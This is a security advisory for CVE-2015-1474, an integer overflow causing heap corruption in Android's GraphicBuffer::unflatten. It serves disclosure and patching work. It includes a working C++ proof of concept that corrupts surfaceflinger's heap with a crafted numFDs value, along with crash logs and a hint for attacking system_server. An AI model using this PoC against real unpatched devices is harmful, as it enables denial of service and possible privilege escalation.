Google Android Integer Oveflow / Heap Corruption

`#############################################################################  
#  
# QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/  
#  
#############################################################################  
#  
# CVE ID: CVE-2015-1474  
# Product: Android  
# Vendor: Google  
# Subject: Integer overflow leading to heap corruption while unflattening  
GraphicBuffer  
# Effect: Gain privileges or cause a denial of service  
# Author: Guang Gong  
  
# Date: March 11th 2015  
#  
#############################################################################  
  
  
Introduction  
------------  
Multiple integer overflows in the GraphicBuffer::unflatten function in  
platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0  
allow attackers to gain privileges or cause a denial of service (memory  
corruption) via vectors that trigger a large number of (1) file descriptors  
or (2) integer values.  
  
Affected Android version  
----------  
  
all versions below Lollipop 5.1  
  
Patches  
-------  
  
Android Bug id 18076253  
There are two patches for this vulnerabilities, the first patch for this  
issue is uncomplete.  
  
[1]  
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2  
  
[2]  
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43  
  
Description  
-----------  
The vulnerable code is as follows.  
  
28  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28>  
native_handle_t  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>*  
native_handle_create  
<http://androidxref.com/4.4.4_r1/s?refs=native_handle_create&project=system>  
(int numFds <http://androidxref.com/4.4.4_r1/s?refs=numFds&project=system>,  
int numInts <http://androidxref.com/4.4.4_r1/s?refs=numInts&project=system>)  
  
29  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#29>  
{  
  
30  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#30>  
native_handle_t  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>* h =  
malloc <http://androidxref.com/4.4.4_r1/s?defs=malloc&project=system>(  
  
31  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#31>  
sizeof(native_handle_t  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>) +  
sizeof(int)*(numFds  
<http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>+numInts  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>  
));---------------> integer overflow here, numFds and numInts can be  
controlled by normal Apps.  
  
32  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#32>  
  
33  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#33>  
h->version  
<http://androidxref.com/4.4.4_r1/s?defs=version&project=system> = sizeof(  
native_handle_t  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>);  
  
34  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#34>  
h->numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>  
= numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>;  
  
35  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#35>  
h->numInts  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>  
= numInts  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>  
;  
  
36  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#36>  
return h;  
  
37  
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#37>  
}  
  
  
  
244  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#244>  
status_t  
<http://androidxref.com/4.4.4_r1/s?defs=status_t&project=frameworks>  
GraphicBuffer  
<http://androidxref.com/4.4.4_r1/s?defs=GraphicBuffer&project=frameworks>::  
unflatten  
<http://androidxref.com/4.4.4_r1/s?refs=unflatten&project=frameworks>(  
  
245  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#245>  
void const*& buffer  
<http://androidxref.com/4.4.4_r1/s?defs=buffer&project=frameworks>, size_t  
<http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>& size  
<http://androidxref.com/4.4.4_r1/s?defs=size&project=frameworks>, int const  
*& fds <http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>,  
size_t <http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>&  
count  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#count>)  
{  
  
…  
  
271  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#271>  
native_handle  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle&project=frameworks>*  
h = native_handle_create  
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_create&project=frameworks>  
(numFds  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>  
, numInts  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>  
);  
  
272  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#272>  
memcpy  
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data  
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>, fds  
<http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>, numFds  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>  
*sizeof(int)); ---------------->heap corruption hear.  
  
273  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#273>  
memcpy  
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data  
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks> + numFds  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>,  
&buf <http://androidxref.com/4.4.4_r1/s?defs=buf&project=frameworks>[8],  
numInts  
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>  
*sizeof(int));  
  
….  
  
  
Attack vector  
-------------  
A normal Apps can corrupt the heap in surfaceflinger and system_server by  
this vulnerabilities.  
  
the PoC of corrupting the heap of surfaceflinger is as follows  
  
#include <sys/types.h>  
  
#include <sys/stat.h>  
  
#include <fcntl.h>  
  
#include <utils/Log.h>  
  
#include <binder/IPCThreadState.h>  
  
#include <binder/ProcessState.h>  
  
#include <binder/IServiceManager.h>  
  
#include <gui/ISurfaceComposer.h>  
  
#include <gui/BufferQueue.h>  
  
#include <gui/CpuConsumer.h>  
  
#include <unistd.h>  
  
  
using namespace android;  
  
class MyBufferQueue:public BufferQueue{  
  
public:  
  
status_t onTransact(uint32_t code, const Parcel& data, Parcel*  
reply, uint32_t flags){  
  
status_t ret =  
BnGraphicBufferProducer::onTransact(code,data,reply,flags);  
  
if(code==1){  
  
int *data = (int *)reply->data();  
  
int *numFDs = data+9;  
  
*numFDs=0xfffffffd;  
  
}  
  
return ret;  
  
}  
  
};  
  
int main()  
  
{  
  
sp<ProcessState> proc(ProcessState::self());  
  
proc->startThreadPool();  
  
const String16 name("SurfaceFlinger");  
  
sp<ISurfaceComposer> composer;  
  
getService(name, &composer);  
  
uint32_t w, h;  
  
PixelFormat f;  
  
sp<IBinder>  
display(composer->getBuiltInDisplay(ISurfaceComposer::eDisplayIdMain));  
  
sp<MyBufferQueue> bufferQueue = new MyBufferQueue();  
  
sp<CpuConsumer> cpuConsumer = new CpuConsumer(bufferQueue, 1);  
  
status_t err = composer->captureScreen(display, bufferQueue, 0,0,0,-1UL);  
  
if (err != NO_ERROR) {  
  
fprintf(stderr, "screen capture failed: %s\n", strerror(-err));  
  
exit(0);  
  
}  
  
printf("screen capture success\n");  
  
IPCThreadState::self()->joinThreadPool();  
  
return 0;  
  
}  
  
How to corrupt the heap of system_server  
  
put a malformated GraphicBuffer in a Bundle, and then send it to  
system_server via setApplicationRestrictions. it’s the same way as  
CVE-2014-7911.  
  
The backtrace of crash surfaceflinger  
  
55 --------- beginning of crash  
  
56 F/libc (15504): Fatal signal 11 (SIGSEGV), code 1, fault addr  
0xb1000000 in tid 15504 (surfaceflinger)  
  
57 I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** ***  
*** *** ***  
  
58 I/DEBUG ( 180): Build fingerprint:  
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'  
  
59 I/DEBUG ( 180): Revision: '11'  
  
60 I/DEBUG ( 180): ABI: 'arm'  
  
61 I/DEBUG ( 180): pid: 15504, tid: 15504, name: surfaceflinger >>>  
/system/bin/surfaceflinger <<<  
  
62 I/DEBUG ( 180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault  
addr 0xb1000000  
  
63 W/NativeCrashListener(15836): Couldn't find ProcessRecord for pid 15504  
  
64 I/DEBUG ( 180): r0 b1000000 r1 b6be41ec r2 ff81eff0 r3  
00000004  
  
65 E/DEBUG ( 180): AM write failure (32 / Broken pipe)  
  
66 I/DEBUG ( 180): r4 b647ac00 r5 fffffffd r6 b6302150 r7  
00000050  
  
67 I/DEBUG ( 180): r8 bef65734 r9 bef65738 sl bef6573c fp  
b081f070  
  
68 I/DEBUG ( 180): ip 80000000 sp bef656f0 lr b6c6cfb7 pc  
b6eb2e30 cpsr a00f0030  
  
69 I/DEBUG ( 180):  
  
70 I/DEBUG ( 180): backtrace:  
  
71 I/DEBUG ( 180): #00 pc 0000fe30 /system/lib/libc.so  
(__memcpy_base+91) ------------------------->memcpy cause heap corruption  
  
72 I/DEBUG ( 180): #01 pc 00005fb3 /system/lib/libui.so  
(android::GraphicBuffer::unflatten(void const*&, unsigned int&, int  
const*&, unsigned int&)+98)  
  
73 I/DEBUG ( 180): #02 pc 00025e09 /system/lib/libgui.so  
  
74 I/DEBUG ( 180): #03 pc 0001e985 /system/lib/libbinder.so  
(android::Parcel::read(android::Parcel::FlattenableHelperInterface&)  
const+176)  
  
75 I/DEBUG ( 180): #04 pc 0002638d /system/lib/libgui.so  
  
76 I/DEBUG ( 180): #05 pc 0002adc3 /system/lib/libgui.so  
(android::Surface::dequeueBuffer(ANativeWindowBuffer**, int*)+226)  
  
77 I/DEBUG ( 180): #06 pc 0002aa81 /system/lib/libgui.so  
(android::Surface::hook_dequeueBuffer_DEPRECATED(ANativeWindow*,  
ANativeWindowBuffer**)+32)  
  
78 I/DEBUG ( 180): #07 pc 000175cf /system/lib/libsurfaceflinger.so  
  
79 I/DEBUG ( 180): #08 pc 0001b80f /system/lib/libsurfaceflinger.so  
  
80 I/DEBUG ( 180): #09 pc 000158f5 /system/lib/libsurfaceflinger.so  
  
81 I/DEBUG ( 180): #10 pc 00010907 /system/lib/libutils.so  
(android::Looper::pollInner(int)+410)  
  
82 I/DEBUG ( 180): #11 pc 000109f9 /system/lib/libutils.so  
(android::Looper::pollOnce(int, int*, int*, void**)+92)  
  
83 I/DEBUG ( 180): #12 pc 00015ad1 /system/lib/libsurfaceflinger.so  
  
84 I/DEBUG ( 180): #13 pc 0001675d  
/system/lib/libsurfaceflinger.so (android::SurfaceFlinger::run()+8)  
  
85 I/DEBUG ( 180): #14 pc 0000083d /system/bin/surfaceflinger  
  
86 I/DEBUG ( 180): #15 pc 0000f811 /system/lib/libc.so  
(__libc_init+44)  
  
87 I/DEBUG ( 180): #16 pc 000008d8 /system/bin/surfaceflinger  
  
88 I/DEBUG ( 180):  
  
89 I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_01  
  
90 I/BootReceiver(15836): Copying /data/tombstones/tombstone_01 to DropBox  
(SYSTEM_TOMBSTONE)  
  
91 I/ServiceManager( 176): service 'SurfaceFlinger' died  
  
92 I/ServiceManager( 176): service 'display.qservice' died  
  
  
  
Milestones  
----------  
  
Date  
  
Comment  
  
Sender  
  
20/10/2014  
  
Initial Report of CVE-2015-1474  
  
Qihoo 360  
  
22/10/2014  
  
Forwarded to the dedicated Team by Google  
  
Google  
  
04/11/2014  
  
Classified it as a high severity vulnerability  
  
Google  
  
06/11/2014  
  
Get the Android Bug ID 18076253  
  
Google  
  
10/2/2015  
  
Notify it’s fixed and send the CVE-ID  
  
Google  
  
16/2/2015  
  
Tell Google the first patch was uncomplete  
  
Qihoo 360  
  
18/2/2015  
  
Submitted the second patch  
  
Google  
  
11/3/2015  
  
Lollipop 5.1 was released, disclose it  
  
Qihoo 360  
  
  
  
References  
----------  
[1]  
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2  
  
[2]  
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43  
  
[3]https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1474  
  
[4]  
http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28  
  
  
`